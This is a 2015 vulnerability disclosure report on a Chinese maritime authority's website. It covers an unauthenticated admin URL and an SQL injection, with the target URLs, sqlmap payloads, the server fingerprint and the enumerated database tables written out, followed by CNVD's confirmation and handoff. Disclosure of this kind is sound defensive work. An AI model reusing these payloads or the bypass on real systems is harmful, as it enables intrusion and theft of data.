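2015-06-17: Details reported to the vendor; awaiting vendor response
2015-06-22: Vendor confirmed; details disclosed only to the vendor
2015-07-02: Details disclosed to core white hats and experts in related fields
2015-07-12: Details disclosed to regular white hats
2015-07-22: Details disclosed to intern white hats
2015-08-06: Details disclosed to the public
Bengbu Maritime Safety Administration (Anhui Province): SQL injection + permission bypass into the admin backend
First, the bypass: simply enter the backend URL directly: http://www.bbmsa.gov.cn/admin/index.htm
Next, the injection: http://www.bbmsa.gov.cn/ggfw/zthd.aspx?id=108 (GET)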
sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=108 AND 5123=5123

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=108; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] bbhsj
[*] master
[*] model
[*] msdb
[*] tempdb

Database: bbhsj
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.web_PublicServices    | 2721    |
| dbo.web_GuestBook         | 307     |
| dbo.web_Subject           | 84      |
| dbo.web_SysRights         | 23      |
| dbo.web_Manager           | 21      |
| dbo.web_FellowLink        | 9       |
| dbo.aspnet_SchemaVersions | 6       |
| dbo.web_PictureRotation   | 6       |
| dbo.sjjlbiao              | 4       |
| dbo.web_Customs           | 4       |
| dbo.caozuoyuan            | 3       |
| dbo.Contact               | 1       |
| dbo.web_Reply             | 1       |
| dbo.web_UnderlingUnits    | 1       |
+---------------------------+---------+
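Severity: High
Vulnerability Rank: 11
Confirmed: 2015-06-22 09:30
CNVD confirmed and reproduced the issue described and forwarded it via CNCERT to the Anhui sub-center, which will coordinate follow-up handling with the organization that manages the website. Based on a combined score across multiple risks, rank 11.
None yet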